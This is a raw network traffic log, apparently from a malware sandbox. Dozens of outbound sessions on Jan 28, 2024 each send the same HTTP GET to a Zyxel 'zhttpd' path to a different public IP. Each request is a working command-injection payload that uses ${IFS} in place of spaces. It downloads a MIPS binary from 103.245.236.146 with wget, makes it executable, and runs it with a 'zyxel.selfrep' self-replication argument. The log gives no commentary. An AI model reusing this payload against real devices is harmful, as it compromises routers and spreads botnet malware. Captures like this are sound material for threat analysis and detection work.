                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4995192.168.2.1434832130.223.172.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.445950031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4996192.168.2.1441004131.3.208.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.445969105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4997192.168.2.1458084187.76.41.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446022034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4998192.168.2.143851277.50.203.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446060896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4999192.168.2.1460946169.213.19.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446100950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5000192.168.2.1454620133.149.168.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446139097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5001192.168.2.1452720155.234.83.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446165085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5002192.168.2.144712688.116.155.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446201086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5003192.168.2.1434770111.109.63.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446235895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5004192.168.2.143775640.19.210.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446288109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5005192.168.2.144893846.16.28.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446327925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5006192.168.2.1447204142.150.31.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446352959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5007192.168.2.143858893.47.133.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446396112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5008192.168.2.1447190198.154.207.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446448088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5009192.168.2.14534544.152.105.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446486950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5010192.168.2.144693674.165.158.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446516037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5011192.168.2.143912896.48.97.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446563959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5012192.168.2.1451438129.68.80.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446621895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5013192.168.2.1442412163.24.83.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446640968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5014192.168.2.143984885.199.107.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446675062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5015192.168.2.1452956211.171.215.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446718931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5016192.168.2.143531086.188.129.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446763992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5017192.168.2.1457950190.95.50.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446791887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5018192.168.2.1456122178.175.141.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446825981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5019192.168.2.1452984178.193.108.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446881056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5020192.168.2.1454604144.49.170.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446918011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5021192.168.2.145543632.49.204.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.446969032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5022192.168.2.1456196119.101.31.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447002888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5023192.168.2.143404024.54.240.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447041988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5024192.168.2.1445824115.119.91.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447082996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5025192.168.2.1460432165.105.211.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447115898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5026192.168.2.1444010141.59.86.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447175980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5027192.168.2.143962691.26.221.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447206020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5028192.168.2.145912699.96.42.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447259903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5029192.168.2.1456562208.46.48.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447292089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5030192.168.2.143938459.59.0.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447340965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5031192.168.2.1440628137.174.213.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447374105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5032192.168.2.1460238189.251.193.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447431087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5033192.168.2.143956899.38.230.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447453022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5034192.168.2.1445106157.32.211.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447494030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5035192.168.2.1460276222.145.104.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447539091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5036192.168.2.143556076.120.220.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447565079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5037192.168.2.1444640131.238.76.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447594881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5038192.168.2.1444540169.198.223.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447654009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5039192.168.2.145282249.8.202.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447674990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5040192.168.2.1445732184.24.70.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447721004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5041192.168.2.1433112128.56.234.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447763920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5042192.168.2.1432892169.24.142.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447803974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5043192.168.2.143455817.192.28.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447849989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5044192.168.2.1436414167.7.41.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447874069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5045192.168.2.145223027.119.10.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.447951078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5046192.168.2.1441510109.224.244.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448247910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5047192.168.2.1434282129.234.203.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448271990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5048192.168.2.1441840133.206.194.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448304892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5049192.168.2.1458658137.127.80.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448337078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5050192.168.2.145297046.135.55.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448373079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5051192.168.2.144854058.86.15.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448429108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5052192.168.2.1456478174.16.147.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448463917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5053192.168.2.1454382118.64.165.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448510885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5054192.168.2.1438094195.115.36.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448550940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5055192.168.2.1446098164.139.139.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.448597908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5056192.168.2.144854034.160.175.54443
                                                        TimestampBytes transferredDirectionData
